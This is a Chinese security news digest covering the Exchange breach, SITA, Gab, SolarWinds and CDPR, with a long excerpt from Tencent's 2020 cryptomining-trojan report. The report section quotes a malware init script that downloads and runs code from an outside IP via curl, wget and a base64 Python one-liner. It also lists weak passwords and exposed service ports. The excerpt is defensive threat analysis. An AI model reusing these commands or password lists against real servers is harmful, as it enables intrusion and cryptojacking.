分类: 今日推送

微软 Exchange 漏洞事件升级

上周五,网络安全记者布莱恩·克雷布斯(Brian Krebs)和安迪·格林伯格(Andy Greenberg)报道称,在一次前所未有的电子邮件服务器攻击中有多达 3 万个组织受到影响。不过在上周末评估的最新数据,全球有超过 6 万个微软 Exchange 服务器客户被黑客攻击,欧洲银行业管理局承认是受害者之一。 Krebs 目前已经梳理了大规模 Exchange 服务器入侵事件的基本时间表,表示微软早在今年 1 月就已意识到这些漏洞。而首个安全补丁是在将近 2 个月之后才发布的,同时官方还发布了一篇博客文章,但没有解释攻击的范围和规模。甚至于微软原本计划将该补丁放在补丁星期二活动日上推出,但鉴于漏洞影响太大,所以才提前 1 周放出。 MIT Technology Review 报道称,除了主要黑客团体 Hafnium 之外,至少有 5 个黑客团体正在利用 Exchange 服务器的漏洞。目前美国政府官员正在争分夺秒的部署措施,一位官员告诉Cyberscoop,这是“A Big F-ing Deal”。 白宫新闻秘书 Jen Psaki 称这是“一个活跃的威胁”,让人们更加关注国土安全部网络安全机构3月3日发出的紧急指令。白宫国家安全顾问杰克-沙利文也对此提出了警告,前网络安全和基础设施安全局局长克里斯托弗-克雷布斯和白宫国家安全委员会也提出了警告。 Chris Krebs 在推文中写道:“这事情大条了。如果你的组织运行一个暴露在互联网上的OWA服务器,假设在02/26-03/03之间被入侵。检查C:\\inetpub\wwwroot\aspnet_client/system_web中的8个字符aspx文件。如果你搜索到了,你就进入了事件响应模式。” 国家安全委员会在推文中写道:“ 如果服务器已经被入侵,打补丁和缓解措施并不是补救措施。任何拥有易受攻击服务器的组织必须立即采取措施,以确定它们是否已经成为目标”。         (消息来源:cnBeta;封面源自网络)  

英特尔和微软共同助力美国 DARPA 加密项目

微软和英特尔已经签署了一项协议以帮助国防高级研究计划局(DARPA)开发一种完全同态加密(FHE)解决方案,该方案将消除数据必须解密才能处理等几个薄弱环节。通过FHE,可以对加密信息进行计算,这将消除解密数据的风险,但如今要实现它需要的计算能力非常大。 为了解决这个问题,DARPA启动了虚拟环境中的数据保护(DPRIVE)计划,英特尔和微软将参与该计划,致力于开发FHE计算的硬件加速器。 据英特尔公司介绍,DPRIVE计划将由几个阶段组成,包括设计、开发和验证将用于硬件的IP块和完整的软件栈。在核心开发工作之外,两家公司将与标准机构合作,围绕FHE制定标准。英特尔表示,也将继续投入资金进行FHE技术的学术研究。 在讨论项目面临的挑战时,DARPA项目经理Tom Rondeau说:”我们目前估计,我们在FHE世界中的计算速度要比在明文世界中的计算速度慢一百万倍。DPRIVE的目标是将FHE降低到我们在明文中看到的计算速度。如果我们能够实现这一目标,同时将技术定位为规模化,DPRIVE将对我们保护和维护数据和用户隐私的能力产生重大影响。” 微软方面表示,很高兴能将其在云计算和同态加密方面的专业知识带到这里。利用英特尔的硬件专长,微软希望能够帮助开发出一种适合商业用途的技术,以弥补 “数据保密性的最后一英里差距”。         (消息及封面来源:cnBeta)

微软发布可排查 Exchange 服务器被入侵的工具

微软Exchange服务器的独立安装存在一系列缺陷,这导致了一场规模庞大的网络安全事件,有几十万台Exchange服务器的安装被黑客组织Hafnium入侵。Krebs on Security报道称,大量的小企业、城镇、城市和地方政府已经被感染,黑客在盗取了数据之余还留下了一个Web Shell,以便进一步指挥和控制。 为了快速帮助潜在受害者判断和解决问题,今天,微软发布了新的工具和指南,帮助服务器管理员检测和减轻威胁。 首先最重要的是,微软发布了免费的Exchange服务器 “入侵指标”工具的更新,该工具可用于扫描Exchange服务器的日志文件,以识别它们是否受到了入侵。 下载地址: https://github.com/microsoft/CSS-Exchange/tree/main/Security 微软还发布了紧急替代缓解指南,供无法应用微软已于3月2日发布的内置独立更新的管理员使用。然而应用补丁仍然是最有效的预防措施,如果你的服务器被感染,全面补救将是一项更大的工作。 “到目前为止,我们已经处理了几十个案例,早在2月28日[微软宣布其补丁之前],一直到现在,”发现攻击的Volexity总裁Steven Adair说。”即使你在微软公布补丁的同一天打了补丁,你的服务器上仍然很有可能存在一个web shell。事实是,如果你正在运行Exchange,而你还没有打补丁,那么你的网络组织很有可能已经被入侵。” “最好的保护是尽快在所有受影响的系统中应用更新,”微软发言人在一份书面声明中说。”我们将继续通过提供额外的调查和缓解指导来帮助客户。受影响的客户应该联系我们的支持团队,以获得额外的帮助和资源。”           (消息来源:cnBeta;封面源自网络)  

全球航空运输数据巨头 SITA 称其数据遭泄露

全球航空运输数据巨头SITA公司已经证实了一起涉及乘客数据的数据泄露事件。该公司周四在一份简短的声明中表示,该公司已成为“网络攻击的受害者”,存储在其美国服务器上的某些乘客数据已被泄露。2月24日该公司证实了这一网络攻击事件,之后其联系了受影响的航空公司。 SITA是全球最大的航空IT公司之一,据说为全球约90%的航空公司提供服务,这些航空公司依靠该公司的旅客服务系统Horizon来管理订票、售票和飞机起飞。但目前仍不清楚到底有哪些数据被访问或被盗。 当联系到SITA时,SITA发言人Edna Ayme-Yahil以正在进行的调查为由,拒绝透露被盗取的具体数据。该公司表示,该事件“影响到全球各个航空公司,而不仅仅是美国的航空公司”。 SITA确认已经通知了几家航空公司–这包括马来西亚航空;芬兰航空;新加坡航空;以及韩国的济州航空,这些航空公司已经就此次事件发表了声明。但SITA拒绝透露其他受影响的航空公司的名字。 在TechCrunch看到的一封给受影响客户的电子邮件中,新加坡航空公司表示,它不是SITA的Horizon乘客服务系统的客户,但约有50万名常旅客会员的会员号和层级身份被泄露。该航空公司表示,转移这类数据是“为了能够验证会员层级状态,并在旅行时给予会员航空公司的客户相关优惠”。该航空公司表示,乘客的行程、预订、票务和护照数据没有受到影响。 SITA是航空市场上少数几家为航空公司提供客票和预订系统的公司之一,与Sabre和Amadeus并列。 Sabre在2017年年中报告了一起影响其酒店预订系统的重大数据泄露事件,黑客获取了超过100万张客户信用卡数据。这家总部位于美国的公司在12月同意240万美元的和解协议,并在泄露事件发生后对其网络安全政策进行修改。 2019年,有安全研究人员发现,法航、英航和澳航等公司使用的Amadeus乘客预订系统存在漏洞,这使得该公司很容易更改或获取旅客记录。         (消息来源:cnBeta;封面源自网络)

unc0ver 利用漏洞发布新版 iOS 越狱工具

伴随着 iOS 系统功能的日趋完善和丰富(例如小部件和深色模式),iPhone 用户也不再执着于越狱了。不过上周末,知名 iPhone 破解团队 unc0ver 发布了最新 6.0.1 版越狱工具,适用于运行 iOS 11 至 iOS 14.3 的 iPhone。 这款越狱工具是该团队基于 CVE-2021-1782 漏洞自主开发的,该漏洞目前已经在 iOS 14.4 版本中修复。该越狱工具适用于 iPhone 6s 及后续产品、iPad Air 2 及后续产品、iPod Touch(第 7 代)。不过需要注意的是,越狱之后如果设备遭到恶意应用程序攻击可能也会获得更高的权限。 你可能还记得,当苹果公司透露上个月发现了被黑客积极利用的漏洞时,我们建议 iPhone 用户尽快更新到 iOS 14.4。看来越狱和苹果的报告很有可能有关,但苹果永远不会肯定证实这一点。         (消息来源:cnBeta;封面源自网络)

类 Palar 平台 Gab 遭黑客攻击

在 Palar 被关闭之后,大量用户涌向了一个类似的平台–Gab,不过该平台近日遭到了黑客攻击。超过 1.5 万名 Gab 用户的公共和个人信息被窃取。援引 Wired 报道,该黑客利用 SQL 注入漏洞从后台数据库中窃取了大约 70GB 的平台用户数据,包含该网站的 4000 多万条帖子。 这些数据包括 1.5 万名 Gab 用户的公共、私人互动,并详细说明了用户的个人资料、哈希密码和组别的纯文本密码。而在泄漏的用户中,包括前美国总统特朗普、MyPillow 首席执行官迈克-林德尔,国会女议员马乔里-泰勒-格林和 Infowars 主持人亚历克斯-琼斯等知名人士的账户。不过,该公司否认自己遭遇了数据泄露,并向 Gab 用户保证,他们的密码没有被泄露。 反保密活动组织 DDoSecrets 已经将这些数据汇编成了一个名为 GabLeaks 的东西,打算将其提供给选定的记者、社会科学家和研究人员进行进一步分析。这引起了 Gab 首席执行官安德鲁-托巴的回应,他将这些黑客活动家描述为 “精神病 “恶魔。       (消息及封面来源:cnBeta)

Facebook 为隐私官司支付 6.5 亿美元和解金

一名法官已经批准了Facebook价值6.5亿美元的和解协议,以结束一场隐私诉讼,该诉讼指控该社交网络未经许可就在其iPhone应用上存储的用户照片上使用面部识别技术。这起始于2015年4月的诉讼指控Facebook没有获得用户同意在他们的照片上使用其面部标签功能。 官司起初由芝加哥律师Jay Edelson代表原告Carlo Licata提起,诉状称伊利诺伊州的隐私法不允许使用未经同意的标签功能。 据《芝加哥论坛报》报道,此案起源于库克县巡回法院,然后转到芝加哥联邦法院再到加州。诉讼到达加州后,该诉讼获得了集体诉讼地位。 该集体诉讼构成了涉及伊利诺伊州约690万Facebook用户的庞大官司,Facebook在2011年6月7日之后为其创建并存储了人脸模板。在11月23日的加入截止日期前,有近160万份索赔表被提交,约占潜在集体成员的22%。申诉书称,Facebook违背了伊利诺伊州生物识别信息隐私法,该法是美国最严厉的隐私法之一。该法案的一部分要求公司在能够开始使用生物识别系统与用户的数据之前,必须获得用户的许可,其中包括面部识别系统。 联邦地区法官詹姆斯-多纳托(James Donato)称这一和解是同类和解中最大的隐私和解案之一,对集体诉讼成员来说是一个 “里程碑式的结果”。”总的来说,该和解是消费者在数字隐私这一备受争议的领域的重大胜利,”多纳托说。 在6.5亿美元的和解金中,每个集体诉讼成员预计将获得至少345美元,而三名指定原告将分别获得5000美元。律师Edelson将获得9750万美元的律师费和约91.5万美元的费用。 支票可能会在两个月内寄给集体成员,不过仍有可能对裁决提出上诉,从而延长案件的审理时间。和解消息传来之际,Facebook正因其迫在眉睫的隐私相关变化而不断攻击苹果公司。由于担心iOS 14的应用追踪透明度中的追踪功能减少可能导致广告收入的损失,Facebook通过广告活动攻击苹果,将这些变化诉称为对小企业不利。 还有报道称,Facebook首席执行官马克-扎克伯格(Mark Zuckerberg)多次被苹果的隐私立场激怒,他想给这家iPhone制造商 “施加痛苦”。 这并不是Facebook面临的唯一一起关于其生物识别数据使用的隐私诉讼。2020年8月,它在加州红木城州法院被起诉,原因是它涉嫌 “收集、存储并从1亿多Instagram用户的生物识别数据中获利”,原因同样是使用面部识别。       (消息及封面来源:cnBeta)

前 SolarWinds CEO 将密码泄露事件归咎于实习生

SolarWinds的现任和前任高层管理人员正在指责一名公司实习生在密码安全方面的严重失误,问题密码 “solarwinds123″于2019年在公共互联网上被一名独立的安全研究人员发现,该研究人员警告公司,该密码的泄露暴露了SolarWinds的文件服务器。周五,在众议院监督委员会和国土安全委员会的联合听证会上,几位美国议员就密码问题向SolarWinds开炮。 “我有一个比’solarwinds123’更强的密码,以阻止我的孩子在iPad上看太多YouTube,”众议员Katie Porter说。”然而你和你的公司本来是要防止俄罗斯人阅读国防部的电子邮件的!” 微软总裁布拉德-史密斯(Brad Smith)也在周五的听证会上作证,他后来表示,没有证据表明五角大楼实际上受到了俄罗斯间谍活动的影响。微软是牵头对黑客活动进行取证调查的公司之一。微软告诉立法者,有 “实质性证据 “证明俄罗斯是破坏性黑客的幕后黑手。 SolarWinds代表周五告诉立法者,密码问题一经报告,就在几天内得到纠正。 但目前仍不清楚在美国历史上最严重的安全漏洞之一中,泄露的密码可能在使疑似俄罗斯黑客监视多个联邦机构和企业方面扮演了什么角色(如果有的话)。窃取的凭证是SolarWinds正在调查的三种可能的攻击途径之一,因为它试图发现它是如何首先被黑客入侵的,黑客继续在软件更新中隐藏恶意代码,然后SolarWinds向大约18000名客户推送,包括许多联邦机构。 SolarWinds首席执行官Sudhakar Ramakrishna表示,SolarWinds正在探索的其他理论包括粗暴地猜测公司密码,以及黑客可能通过受损的第三方软件进入。 面对众议员Rashida Tlaib的质询,SolarWinds前CEO Kevin Thompson表示,密码问题是 “一个实习生犯的错误”。”他们违反了我们的密码政策,他们在内部、在自己的私人Github账户上发布了这个密码,随后被发现并引起我的安全团队的注意,他们就把那东西撤下来了。”Thompson和Ramakrishna都没有向立法者解释为什么公司的技术首先允许使用这样的密码。Ramakrishna后来作证说,这个密码早在2017年就已经在使用了。 “我相信那是一名实习生在2017年时在他的一台Github服务器上使用的密码,这被报告给了我们的安全团队,并立即被删除。” 然而,这个时间段比报道的时间要长得多。发现泄露密码的研究人员Vinoth Kumar此前告诉CNN,在公司于2019年11月纠正该问题之前,至少从2018年6月起就可以在网上获取密码。 Kumar和SolarWinds之间的电子邮件显示,泄露的密码允许其登录并成功地将文件存入该公司的服务器。Kumar警告说,利用这种策略,任何黑客都可以向SolarWinds上传恶意程序。 在听证会上,FireEye首席执行官Kevin Mandia表示,可能无法完全确定疑似俄罗斯黑客造成的损失有多大。我们可能永远不知道损害的范围和程度以及可能永远不知道被窃取的信息是如何使对手受益的。” 为了进行损害评估,官员们不仅要对被访问的数据进行编目,还要想象数据可能被外国行为者使用和滥用的所有方式,这是一项艰巨的任务。       (消息及封面来源:cnBeta)

腾讯安全发布《 2020 挖矿木马年度报告》:比特币涨 10 倍、门罗币涨 6 倍,挖矿木马同步增长

一、摘要 2020年各类数字加密货币价格迎来暴涨,比特币价格一度超过5万美元/BTC,市值达到9200亿美元,是2019年底的10倍之多,达到了历史最高点。同期挖矿木马最偏好的门罗币价格也同步增长6倍,这意味着黑客通过进行门罗币挖矿,兑现后收益可达到以往收益的6倍。 在如此大利益诱惑之下,黑产团伙已闻风而动,纷纷加入了对主机计算资源的争夺。一个典型现象就是,有大量挖矿木马在运行时,会尝试清除竞争对手木马。 门罗币价格曲线(数据来源:coinmarketcap.com) 根据腾讯安全威胁情报中心的检测数据,2020年挖矿木马上升趋势十分明显。 2020年挖矿木马增长趋势 本报告以腾讯安全产品获取的安全事件告警工单数据为基础,统计分析得出2020年挖矿木马的活跃家族TOP榜,从挖矿木马主要入侵特点、漏洞利用偏好、持久化运行手段等方面展示其主要威胁,预测未来挖矿木马攻击可能呈现的新趋势,给政企机构安全运维团队提供常见挖矿木马的防御清理建议。 二、挖矿木马风险 1.1 挖矿家族TOP榜 2020年度挖矿木马家族排名前三的分别为DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner,榜单中有通过永恒之蓝漏洞传播的为DTLMiner、NSABuffMiner、NSAGluptebaMiner,有利用Redis、Hadoop、Weblogic、Drupal、thinkphp等应用程序漏洞传播的为H2Miner、GuardMiner、z0Miner、8220Miner等家族,以及主要通过弱口令爆破进行传播的为KoiMiner家族。 1.2 挖矿木马的危害 挖矿木马最容易被感知到的影响就是服务器性能会出现严重下降,从而影响服务器业务系统的正常运行,严重时可能出现业务系统中断或系统崩溃。如下图所示案例,H2Miner挖矿木马运行时占用了98%的CPU资源,系统性能已严重受损。 其次,挖矿木马威胁事件往往伴随着攻击者组建僵尸网络。感染挖矿木马的同时,服务器已成为黑客控制的肉鸡电脑,除了硬件资源被浪费,黑客还可能利用失陷主机对其他目标进行攻击,包括蠕虫式的横向攻击扩散、对特定目标进行DDoS攻击、作为黑客下一步攻击的跳板隐藏攻击者线索或攻击真实意图、将失陷主机作为分发木马的下载服务器或C2服务器等等。 第三,失陷主机可能造成信息泄露。攻击者入侵成功,很多情况下已获得服务器的完全权限,只要攻击者愿意,就可能盗取服务器数据,使受害企业面临信息泄露风险,攻击者也可能在服务器下载运行勒索病毒,随时可能给企业造成更加严重的破坏。 第四,攻击者入侵安装挖矿木马的同时,还可能在服务器安装后门、服务和计划任务,实现对失陷主机的稳固长期控制。腾讯安全专家分析发现,较多挖矿木马威胁事件发生后,攻击者会添加管理员用户、安装远程控制软件,以及为方便攻击者下次连接开放特定的网络端口。 鉴于以上这些危害,我们建议政企机构安全运维人员高度警惕挖矿木马感染事件,挖矿可能仅仅是攻击者制造危害的第一步,极可能处于黑客入侵后危害最轻的阶段。 2.挖矿木马入侵通道 2.1 利用漏洞攻击 远程代码执行漏洞(RCE)可以让远程攻击者直接向后台服务器远程注入操作系统命令或者恶意代码,从而控制后台系统,挖矿木马攻击时最常用的远程代码执行漏洞TOP统计如下: 在2020年挖矿木马最常利用的RCE漏洞排行榜里,WebLogic CVE-2019-2725高居榜首。 此外,还有各种未授权访问漏洞被攻击者利用。即需要安全配置或权限认证的地址、授权页面存在缺陷导致攻击者可以直接访问,从而引发敏感信息泄露或恶意代码执行。挖矿木马攻击时常用未授权访问漏洞列表如下: 未授权访问应用类型 开放默认端口 Redis 6379 Hadoop Yarn RESET API 8088 Docker Remote API 2375 Kubernetes 10255/10250 Jenkins 8080 XXL-JOB 9999 宝塔面板phpMyAdmin 888 Apache Flink Dashboard 8081 PostgreSQL 5342 典型案例 案例1:Z0Miner利用公开仅15天的高危漏洞攻击挖矿 腾讯安全团队于2020年11月2日发现挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)进行攻击,本次攻击距离Weblogic官方发布安全公告(2020.10.21)之后仅仅15天。 挖矿木马团伙对于新漏洞武器的采用速度之快,由此可见一斑。这一案例促使安全研究人员需要更快速的响应高危安全漏洞,当面临数量庞大的云主机高危漏洞需要修补时,对安全运维人员构成极大挑战。 案例2:redis服务器配置弱口令致SuperManMiner控制约万台主机挖矿 腾讯安全威胁情报中心检测到利用Redis未授权访问漏洞直接写入计划任务,下载用golang语言编写的挖矿木马下载器superman,根据挖矿算力推测该团伙已控制约1万台失陷系统进行门罗币挖矿。 在本例中,部分政企机构使用Redis时,由于没有对redis进行良好的配置,如使用空口令或者弱口令等,导致攻击者可以直接访问redis服务器,并可以通过该问题直接写入计划任务甚至可以直接拿到服务器权限。 案例3:RunMiner控制约1.6万台主机挖矿 腾讯主机安全(云镜)捕获RunMiner挖矿木马利用Apache Shiro反序列化漏洞(CVE-2016-4437)攻击云服务器。RunMiner挖矿团伙入侵成功后会执行命令反弹shell连接到C2服务器对肉鸡系统进行远程控制,然后继续下载执行Run.sh,下载XMRig挖矿木马tcpp进行门罗币挖矿,病毒通过安装定时任务进行持久化。 根据RunMiner挖矿木马使用的门罗币钱包算力(约268.6KH/s)推算,该挖矿团伙已控制约16000台服务器执行挖矿任务。在黑客控制的服务器上还发现多个扫描探测、网络入侵和远程控制工具,该团伙显然是专业黑灰产经营团伙之一。 2.2 爆破攻击 用户在设置系统登陆密码时,为了方便记忆往往采用默认的空口令或者非常简单的密码例如admin、root、test、111111、123456等,使用这些密码导致黑客可以轻易猜解并登陆,从而入侵系统,部分常见的弱密码如下: admin admin12 admin888 admin8 admin123 sysadmin adminxxx adminx root roots test test1 test123 test2 password aaaAAA111 888888 88888888 000000 00000000 111111 11111111 aaaaaa aaaaaaaa 135246 135246789 123456 许多挖矿木马在传播时也会针对系统的弱密码进行爆破攻击,根据腾讯安全2020年云上安全报告提供的数据,默认用户名、端口名被爆破攻击的次数达数十亿次之多。常被挖矿木马爆破攻击的服务类型包括SSH、Mssql、Redis等,各类型爆破攻击对应的挖矿家族如下: MS SQL 永恒之蓝下载器木马、GuardMiner 、MrbMiner、BasedMiner、贪吃蛇挖矿木马、快GO旷工 SSH爆破 永恒之蓝下载器木马、Ks3_Miner、LoggerMiner、8220Miner、DDG Redis爆破 永恒之蓝下载器木马、H2Miner、GuardMiner、DDG Msql爆破 Mykings 2.3 僵尸网络渠道 利用僵尸网络渠道分发成为挖矿木马越来越偏好的传播手段之一,挖矿木马自身也在组建僵尸网络。僵尸网络在分发安装挖矿木马的同时,还会下载持久化模块、远程控制模块、攻击传播模块、自动更新模块等多种恶意组件,以达到对已感染机器进行长久利用和控制的目的,已失陷的肉鸡系统又会成为新的攻击源,如此不断扩大僵尸网络的规模。 具有僵尸网络特征的挖矿木马TOP榜如下,其中前三位是DTLMiner(永恒之蓝下载器木马)、H2Miner、GuardMiner为老牌僵尸网络,由于控制该僵尸网络的幕后黑客团伙仍在不断更新其攻击方法,使其在出现后的数年里仍然保持很高的活跃度。 在2020年新活跃的挖矿木马家族以Linux服务器为攻击对象的居多,例如通过SSH弱口令攻击的Outlaw、Prometei,通过Docker Remote API漏洞入侵的TeamTNT,以及通过Nexus Repository Manager 3弱密码入侵,利用Mysql、Tomcat弱口令爆破,Weblogic远程代码执行漏洞进行横向扩散的Sysrv-hello家族等等。 典型案例 案例4:TeamTNT TeamTNT挖矿团伙通过批量扫描公网上开放2375端口的云服务器,并尝试利用Docker Remote API未授权访问漏洞对云服务器进行攻击。 TeamTNT在成功入侵云服务器后,会隐藏进程,通过安装定时任务持久化,并收集主机上的隐私数据(如主机用户名和密码、RSA登录凭证、AWS CLI跨账户授权信息、docker配置信息)上传到C2服务器。与此同时,为了控制更多肉鸡系统,增加挖矿收益,TeamTNT团伙还利用SSH复用连接进行横向移动以感染更多服务器。 案例5:Sysrv-hello 腾讯安全威胁情报中心检测到Sysrv-hello僵尸网络对云上Nexus Repository Manager 3存在默认帐号密码的服务器进行攻击。得手后再下载门罗币矿机程序挖矿,同时下载mysql、Tomcat弱口令爆破工具,Weblogic远程代码执行漏洞(CVE-2020-14882)攻击工具进行横向扩散。其攻击目标同时覆盖Linux和Windows操作系统。 案例6:Outlaw 腾讯安全威胁情报中心检测到国内大量企业遭遇亡命徒(Outlaw)僵尸网络攻击。亡命徒(Outlaw)僵尸网络最早于2018年被发现,其主要特征为通过SSH爆破攻击目标系统,同时传播基于Perl的Shellbot和门罗币挖矿木马。腾讯安全威胁情报中心安全大数据显示,亡命徒(Outlaw)僵尸网络已造成国内约2万台Linux服务器感染,影响上万家企业。 此次攻击传播的母体文件为dota3.tar.gz,可能为亡命徒(Outlaw)僵尸网络的第3个版本,母体文件释放shell脚本启动对应二进制程序,kswapd0负责进行门罗币挖矿,tsm32、tsm64负责继续SSH爆破攻击传播病毒。 3.挖矿木马持久化 入侵者攻击得逞之后,会通过各种技术手段安装后门、服务和定时任务,添加管理员帐户、开放网络端口,实现对失陷主机的持久控制。 3.1 Linux定时任务 WatchbogMiner通过多种方式创建定时任务,在指定的时间执行恶意代码: 1)通过写入文件创建 写入文件如下: /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/system /etc/cron.d/apache /etc/cron.d/root /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane 2)通过crontab命令创建 3)通过at命令创建 4)通过修改环境变量”/home/$me/.bashrc”、”/root/.bashrc”创建 3.2    Linux系统服务 1)WannaMine将恶意代码写入启动目录/etc/rc.d/init.d目录下,随系统启动执行。 2)8220Miner通过写入系统初始化脚本/etc/init.d/down,将恶意代码添加到启动项。 echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL hxxp://5.196.247.12/xms||wget -q -O- hxxp://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download hxxp://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3)Muhstik僵尸网络通过写入/etc/inittab,添加恶意程序到系统启动项。 4)4SHMiner通过安装服务/etc/init.d/c3pool_miner启动挖矿脚本。 5)4SHMiner4SHMiner通过安装服务/etc/systemd/system/moneroocean_miner.service启动挖矿脚本。 3.3    Windows WMI KingMiner使用WMI创建名为WindowsSystemUpdate_WMITimer的计时器,并将事件消费者WindowsSystemUpdate_consumer通过事件过滤器WindowsSystemUpdate _filter绑定到计时器,从而通过计时器每15分钟执行一次恶意脚本代码。 三、未来趋势 挖矿木马针对云上攻击增长较快,企业安全管理人员时刻面临新的挑战。黑灰产业对谋求非法利益的追求没有止境。受利益趋势,挖矿团伙对新漏洞武器的采用速度越来越快,这对防御方的安全响应能力提出了更高的要求。与此同时,众多网络组件的安全漏洞仍会源源不断涌现。 旧的挖矿僵尸网络依然活跃,新僵尸网络不断出现,模块化的、持续扩张、挖矿团伙跟僵尸网络相互勾结的情况日趋多见。这种复杂的安全态势使得政企机构难以采用单一技术方案防御和清除威胁。 四、安全建议 腾讯安全团队在20多年的安全实践中,逐步改进保护自身业务所采用的多层级安全解决方案,将安全威胁情报、主机云防火墙、云主机安全等一系列安全产品统一由安全运营中心(SOC)管控,构建多层次的纵深防御体系,全面阻断挖矿木马的攻击威胁。 腾讯安全全系列产品支持在挖矿木马、僵尸网络入侵攻击的各个环节进行检测、防御: 4.1 防御建议 1)建议政企机构运维人员对Linux服务器的SSH服务、Windows SQL Server等常用主机访问入口设置高强度的登录密码,以对抗弱口令爆破攻击。 推荐政企机构在终端部署腾讯云主机安全(云镜)产品,腾讯主机安全产品具有密码爆破拦截、异地登录提醒、木马文件查杀、高危漏洞检测等安全功能,可对云主机的Linux系统、Mysql、Tomcat等账号的弱口令进行检测。 2)对于Redis、Hadoop Yarn、Docker、XXL-JOB、Postgres等应用增加授权验证,对访问对象进行控制。 3)如果服务器部署了Weblogic、Apache Struts、Apache Flink、ThinkPHP等经常曝出高危漏洞的服务器组件,应及时将其更新到最新版本,并且实时关注组件官方网站和各大安全厂商发出的安全公告,根据提示修复相关漏洞。 推荐政企机构在网络边界部署腾讯云防火墙产品,腾讯云防火墙基于网络流量进行威胁检测与主动拦截,腾讯安全团队会及时响应最流行的高危漏洞利用,快速发布检测规则,使用虚拟补丁技术有效阻断挖矿木马入侵时利用的各类高危漏洞。 4.2 清理建议 政企机构运维人员可以使用腾讯主机安全产品检测清除入侵服务器的各种木马,根据主机安全木马查杀告警信息的指引彻底清除病毒木马。 在日常运维中,系统管理员可注意以下内容: 1)检查有无占用CPU资源接近甚至超过100%的进程,如有找到进程对应文件,确认是否属于挖矿木马,Kill 挖矿木马进程并删除文件;kill 掉包含下载恶意shell脚本代码执行的进程; 2)检查/var/spool/cron/root、/var/spool/cron/crontabs/root等文件中有无恶意脚本下载命令,有无挖矿木马启动命令,并将其删除; 3)如有发现挖矿相关进程、恶意程序,及时对服务器存在的系统漏洞、弱口令、Web应用漏洞进行排查和修复。

《赛博朋克 2077 》开发商推迟发布补丁:黑客攻击导致开发瘫痪

2月25日CDPR官方在微博上宣布,《赛博朋克2077》1.2版更新内容将推迟发布。因为CDPR近期遭受网络攻击,并且1.2版本内容较多需更多时间打磨。预计新的发布时间为三月份的下半月。 尽管我们真切地想要在曾说明的时间内推出《赛博朋克 2077》的1.2 版本更新,但是由于工作室 IT 架构近期遭受网络攻击以及出于1.2 版本本身体量的考虑,我们需要更多时间。 我们为 1.2 版本设定的目标超出了之前的所有更新,它将为游戏各方面带来诸多改善和修复。为了确保这一点,我们还有更多工作要做。因此,我们预计新的发布时间为三月下半。 这并非我们希望分享给大家的消息,但我们需要更为妥善地发布此次版本更新。更多讯息将于届时带来。感谢您一如既往的耐心和支持。 目前《赛博朋克2077》最新的大型更新是1.1版本,主要对多方面的稳定性作出了改善。 据报道,2月24日,《赛博朋克2077》的开发商波兰“CD Projeckt”公司宣布,公司之前遭遇的黑客袭击干扰了游戏补丁包的开发工作,因此该游戏的补丁将会推迟到三月的“后半部分”发行。 这次黑客攻击发生在二月初,黑客攻破了CD Projeckt公司的内部信息系统,其中包括《赛博朋克2077》游戏的源代码。这对于该公司来说是屋漏偏逢连夜雨。之前,《赛博朋克2077》发布之后被爆出问题多多。 该公司在推特官方账号上表示,公司很希望在之前公布的时间段内推出《赛博朋友》1.2版补丁,然而公司IT基础设施遭遇的网络攻击,再加上游戏升级的工作量庞大,这意味着公司将无法按照原定时间发布补丁包,相关开发需要更多时间。 一月份,该公司已经针对《赛博朋克2077》游戏推出了一个补丁包,并且计划在二月份推出一个更大的补丁包。 “CD Projeckt”公司以“巫师”系列中世纪奇幻角色扮演游戏而闻名,这些游戏的成功也导致该公司股价大幅上涨,然而《赛博朋克2077》游戏发布之后出现的问题,导致股价在去年底下跌。 据报道,这一次黑客袭击属于“勒索式攻击”,黑客要求被攻击者支付赎金,除了《赛博朋友2077》游戏源代码之外,黑客还获取了公司员工个人隐私信息以及其他敏感数据。一些信息稍后曾经在网络上销售。 消息人士透露,面对这次勒索攻击,CD Projeckt公司拒绝支付赎金,这导致员工时至今日无法登录公司虚拟专用网,无法获取完成游戏开发的工具。 对于员工来说,这次攻击也是一次“噩梦”。黑客获取了大量员工个人信息,包括波兰身份号码、个人护照信息。公司要求员工紧急冻结个人银行账号,并且向政府机构以及相关银行报告了攻击事件。 另外,该公司还要求员工把个人电脑带到IT部门,检查是否被植入恶意软件或是其他入侵工具。 之前,由于游戏爆出质量问题,索尼公司采取了极端措施,将《赛博朋克2077》游戏从“PlayStation游戏商店”紧急撤架。而1.2版补丁被认为是解决问题的最重大补丁包,该公司表示:“我们对于1.2版补丁的开发目标超过了之前所有的补丁。”       (消息及封面来源:新浪科技)